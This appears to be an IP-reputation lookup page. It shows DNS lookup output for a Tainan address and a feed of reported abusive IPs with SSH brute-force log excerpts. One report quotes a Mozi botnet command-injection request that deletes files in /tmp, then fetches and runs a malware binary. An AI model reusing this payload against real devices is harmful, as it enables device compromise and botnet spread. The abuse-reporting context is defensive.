Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: Tainan

Region: Tainan

Country: Taiwan, China

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 140.116.114.29
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 46715
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;140.116.114.29.			IN	A

;; AUTHORITY SECTION:
.			248	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2023050200 1800 900 604800 86400

;; Query time: 78 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue May 02 15:46:44 CST 2023
;; MSG SIZE  rcvd: 107
Host info
Host 29.114.116.140.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 29.114.116.140.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
36.250.229.115 attackspambots
...
2020-09-11 15:28:35
183.108.88.186 attackspambots
Sep 11 10:02:12 root sshd[1174]: Invalid user ubnt from 183.108.88.186
...
2020-09-11 15:41:36
68.197.126.163 attackbots
Invalid user cablecom from 68.197.126.163 port 51245
2020-09-11 15:24:12
159.89.113.87 attack
Abuse
2020-09-11 15:52:01
185.220.101.134 attack
2020-09-11T05:38:38.696049server.espacesoutien.com sshd[1244]: Failed password for root from 185.220.101.134 port 12154 ssh2
2020-09-11T05:38:40.624325server.espacesoutien.com sshd[1244]: Failed password for root from 185.220.101.134 port 12154 ssh2
2020-09-11T05:38:42.831720server.espacesoutien.com sshd[1244]: Failed password for root from 185.220.101.134 port 12154 ssh2
2020-09-11T05:38:44.816258server.espacesoutien.com sshd[1244]: Failed password for root from 185.220.101.134 port 12154 ssh2
...
2020-09-11 15:32:22
186.64.111.114 attackbotsspam
[f2b] sshd bruteforce, retries: 1
2020-09-11 15:25:08
122.248.33.1 attackspambots
Port scanning [2 denied]
2020-09-11 15:21:06
115.99.72.185 attackspam
/HNAP1/
2020-09-11 15:32:00
167.71.187.10 attackbots
Invalid user ubuntu from 167.71.187.10 port 34328
2020-09-11 15:33:30
49.234.56.65 attackbots
$f2bV_matches
2020-09-11 15:28:07
210.14.77.102 attack
$f2bV_matches
2020-09-11 15:58:16
223.17.10.50 attackbots
Sep 10 22:00:28 ssh2 sshd[18194]: User root from 223.17.10.50 not allowed because not listed in AllowUsers
Sep 10 22:00:28 ssh2 sshd[18194]: Failed password for invalid user root from 223.17.10.50 port 40619 ssh2
Sep 10 22:00:28 ssh2 sshd[18194]: Connection closed by invalid user root 223.17.10.50 port 40619 [preauth]
...
2020-09-11 15:36:10
202.83.42.235 attack
C2,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
2020-09-11 15:57:34
24.51.127.161 attackbots
malicious Brute-Force reported by https://www.patrick-binder.de
...
2020-09-11 15:46:59
182.61.10.28 attackbotsspam
...
2020-09-11 15:26:32

Recently Reported IPs

139.198.13.247 158.194.88.74 140.116.96.48 140.116.72.65
137.215.231.238 143.89.40.46 140.116.14.253 175.159.122.179
120.124.168.170 134.225.1.159 14.139.242.244 140.116.67.216
113.53.43.155 140.116.36.170 114.79.38.232 163.22.2.1
140.116.215.109 169.237.172.182 140.116.154.82 140.116.239.73